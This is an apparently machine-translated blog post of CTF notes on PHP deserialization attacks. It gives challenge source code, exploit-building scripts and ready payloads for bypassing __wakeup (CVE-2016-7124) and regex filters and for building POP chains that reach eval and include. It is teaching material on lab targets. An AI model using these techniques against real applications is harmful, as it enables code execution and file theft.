当前位置:网站首页>CTF_ Web: deserialization of learning notes (II) CTF classic test questions from shallow to deep
CTF_ Web: deserialization of learning notes (II) CTF classic test questions from shallow to deep
2022-06-25 04:31:00 【AFCC_】
0x00 CTF Deserialization problem in
In this kind of topic, we mainly use deserialization to bypass or call various magic methods , To construct a qualified serialized string , Complete specific functions , At this point, the execution flow of the entire code segment should be clear . Let's start with the simplest .
0x01 Attack and defend the world unserialize3
The source code of the title is :
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
Here we can see that there is only one magic method , and __wakeup() The magic method is to check the executed function before deserializing , in other words , Whatever comes in , Will give priority to implementation __wakeup() Method , But this is for __wakeup() There is one method CVE Loophole ,CVE-2016-7124, When the incoming serialization string is different from the actual number of parameters when deserializing the object, the execution will be skipped , That is, there is only one parameter in the current function $flag, If the number of parameters in the incoming serialization string is 2 You can bypass .
as follows :
<?php
class xctf{
public $flag = '111';
}
$a = new xctf();
echo serialize($a);
Get the results O:4:"xctf":1:{s:4:"flag";s:3:"111";}, Will class xctf Parameters in 1 It is amended as follows 2, Submit code, obtain flag.
0x02 Attack and defend the world Web_php_unserialize
Title source code is :
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>
Here is a code audit first , The code part is relatively simple , The boss must have known at a glance that this place only needs to be bypassed preg_match Regular and __wakeup Function , Because here weakup The string that will be deserialized soon file Replace it with index, So back to the current page .
The first is the regular bypass :/[oc]:\d+:/i
The meaning of this regular passage is to match all with o、c、O、C start , Add a colon :, Add numbers 、 Plus a colon : String , Ignore case , That is to say o:4: This part serializes the match at the beginning of the string . Use here +4 Bypass , This is because this bypasses the regular condition here , Will not change o Value after , because +4 And 4 It's the same , It does not affect the result of deserialization .
The second is wakeup,wakeup Just count the number of object attributes of the serialized string 1 Just change to another number , But notice here file The type is private, So the printed string has invisible characters %00 Of , Don't copy yourself base, Otherwise, the result will be different .O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.php";}
$a= new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace("O:4","O:+4",$b);
$b = str_replace(":1:",":2:",$b);
echo base64_encode($b);
The final result is :index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
0x03 XMAN2017 unserialize
Access topic tips get The ginseng code
So try to pass in 1, Get a hint hint: flag.php
Visit to get the next prompt :
visit help.php, Get part of the source code :
After sorting out the code, we get :
<?php
class FileClass
{
public $filename = 'error.log';
public function __toString(){
return file_get_contents($this->filename);
}
}
That is to say, this is a trigger Tostring The subject of , In the previous knowledge, we also mentioned that this function is triggered when the object is treated as a string , Generally in echo When you print the function, you can , So let's use this
$a = new FileClass();
echo serialize($a);
Pass to code Do a test , Find back :
in other words , After each serialization, one of the Tostring function , Return the contents of the file , It's just that there's no error,log, So let's replace the content with flag.php that will do .
Pass in ?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";} Check the source code to get flag.
0x04 pop Chain construction
The following part of the content code is from F12sec , author spaceman. Thank you for sharing , Learn the execution process of deserialization through several examples
<?php
highlight_file(__FILE__);
class pop {
public $ClassObj;
function __construct() {
$this->ClassObj = new hello();
}
function __destruct() {
$this->ClassObj->action();
}
}
class hello {
function action() {
echo "hello pop ";
}
}
class shell {
public $data;
function action() {
eval($this->data);
}
}
$a = new pop();
@unserialize($_GET['s']);
In this code , It is easy to see that the danger function is shell Class action Method , And the first class pop It will automatically go to... When it is created new One hello class , And call... On destruction hello Of action Method , We just need to take advantage of the feature that is automatically invoked when destroyed . Change the original execution process , Specific for :new pop --> new hello --> action(hello)new pop --> new shell --> action(shell)
So the code above becomes
<?php
highlight_file(__FILE__);
class pop {
public $ClassObj;
function __construct() {
$this->ClassObj = new shell();
}
function __destruct() {
$this->ClassObj->action();
}
}
class hello {
function action() {
echo "hello pop ";
}
}
class shell {
public $data ="phpinfo();" ;
function action() {
eval($this->data);
}
}
$a = new pop();
echo serialize($a);
This completes the change of the execution process , We put the final result O:3:"pop":1:{s:8:"ClassObj";O:5:"shell":1:{s:4:"data";s:10:"phpinfo();";}} Pass in s in , It is implemented phpinfo The interface behind , Completed the change of execution process .
0x05 MRCTF2020Ezpop
Title source code is :
<?php
class Modifier {
protected $var = "flag.php";
public function append($value){
include($value);
}
public function __invoke(){
echo "__invoke";
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
echo "__tostring";
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = new Modifier();
}
public function __get($key){
echo "__get";
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
The code here is longer , But we analyze them one by one , They are all the knowledge points summarized before .
- First of all Modifier class :
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
Here we see only one magic method invoke, We have summed up , call invoke Is to access the object as a function , therefore modifier The gesture used by the class is :
$a = new Modifier();
$a();
- The second is show class :
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
Here you can see that the magic method is tosting and wakeup,tostring The object needs to be accessed as a string , In this class, just at the time of initialization construct Used in echo; there wakeup Just pass the parameter Show The value in does not contain the specified character .
- The third is Test class
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
test Magic methods in class __get When we need to access a nonexistent property, we call , And will put itself in the class p The value of is executed as a function .
The posture used is :
$b = new Test();
$b->a;
Access properties that don't exist , Where does the attribute not exist , stay Show Class tostring Called $this->str->source, and Test Class does not source attribute , So let's Show Class str Property becomes Test Class .
That is to say, here should be :
$a = new Show("123");
$a->str = new Test();
In fact, it becomes clearer here , It's like going back to the first class modifier The execution conditions of , Execute a value as a function . The ultimate goal is to use the files you want to view Modifier Class include($value); Function contains .
So the process is :Show In the implementation of tostring——> The visit came to Test Medium source——> and Test There is no source——> So I did __get magic ——> take this->p Execute as a function , It can be seen here this->p The utilization point of the first class should be Modifier The object of . To include the files you want to include .
The code is :
<?php
class Modifier {
protected $var = "flag.php";
public function append($value){
include($value);
}
public function __invoke(){
echo "__invoke";
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
echo "__tostring";
return "556"; // Notice that the original this->str->source change , If you don't change , stay new The second time Show You'll be prompted Method Show::__toString() must return a string value
}
public function __wakeup(){ // Here are two incoming source Parameters do not contain regular content , So the filter function is not triggered .
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = new Modifier();
}
public function __get($key){
echo "__get";
$function = $this->p;
return $function();
}
}
$a = new Show("afcc"); // It doesn't matter what you type in this topic , Will not affect the subsequent results
$a->str = new Test();
//echo $a; Here is to call again Show Output yourself , To make echo establish .
$c = new Show($a);
echo urlencode(serialize($c)); // here urlencode To prevent protected Objects affect the results .
Final input O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22afcc%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
That is, the serialized string , Be careful *var Ahead %00.
When the topic is finished, let's turn it around , In fact, there is wakeup It didn't work , Because for the last serialized string Show Class source It didn't work , Even if it is modified before deserialization , It does not affect the subsequent output . If you change it to
this->str = "index.php";
At this point, we need to consider how to bypass the problem .
0x06 Summary
After studying deserialization these days , It is found that the main knowledge points focus on the call timing of each magic method 、 Regular matching bypasses and pop The structure of the chain , Learning is slow , It needs to accumulate slowly .
pop Chains are constructed first
- Analyze whether each function has a point of existence and utilization 、 How to use , for example wakeup、get And so on
- Is there any connection between them 、 For example, the utilization condition of the first is exactly the initialization content of the second
- Finally, we need to control eval、include And so on .
It still needs more practice to master .
边栏推荐
- Numpy NP tips: use OpenCV to interpolate and zoom the array to a fixed shape cv2 resize(res, dsize=(64, 64), interpolation=cv2. INTER_ CUBIC)
- 如何筛选出和产品相关的词,精准排除掉无效词
- 彻底理解数据库事务
- Text keyword extraction: ansj
- GbASE 8s中的Blob 页(Blobspace page)
- GBASE 8s的级联删除功能
- "Comment positionner l'industrie" dans la planification industrielle locale / parc
- IntStream API介绍
- Openmmlab environment configuration
- 第二十五周记录
猜你喜欢
数字时代的“文艺复兴”?起底数字藏品,让人欢喜让人愁
Exercise: how difficult is it to simulate the blessing lottery two-color ball - China 500W grand prize? Just run the code.
马斯克发布人形机器人,AI对马斯克为什么意义重大?
"Comment positionner l'industrie" dans la planification industrielle locale / parc
![[openwrt] we recommend a domestically developed version of openwrt, an introduction to istoreos. It is very easy to use. It is mainly optimized. It solves the problem of Sinicization.](/img/62/6152d5a30c92a340cb286c7b1cbc54.png)
[openwrt] we recommend a domestically developed version of openwrt, an introduction to istoreos. It is very easy to use. It is mainly optimized. It solves the problem of Sinicization.
论文阅读《LSD-SLAM: Large-Scale Direct Monocular SLAM》
PHP extracts and analyzes table contents, and collects bidding information
mongodb集群
Lecture record: new application of inertial navigation - inertial measurement
Nodejs 通过Heidisql连接mysql出现ER_BAD_DB_ERROR: Unknown database 'my_db_books'
随机推荐
Detailed explanation of flex attributes in flex layout
Easyrecovery15 very easy to use computer data recovery software
Anaconda installation +tensorflow installation +keras installation +numpy installation (including image and version information compatibility issues)
kenlm
关于TCP连接三次握手的详细总结
Upgrade cmake
Intel 13th generation core showed its true colors for the first time: 68mb cache improved significantly
Lecture record: history and development of strapdown inertial navigation solution
CTF_ Web: Advanced questions of attack and defense world expert zone WP (1-4)
GBASE 8s的多线程结构
UCLA | generative pre training for black box optimization
Is opencv open source?
Win10 environment phpstudy2016 startup failure record
如何绘制产业招商地图
Musk released humanoid robot. Why is AI significant to musk?
515. 在每个树行中找最大值 / 剑指 Offer II 095. 最长公共子序列
1. Phase II of the project - user registration and login
5 key indicators of SEO: ranking + traffic + session + length of stay + bounce rate
讲座记录《多种空间大地测量技术的数据处理方法和应用》
2020.3.3 notes async/await and promise and Then processes and threads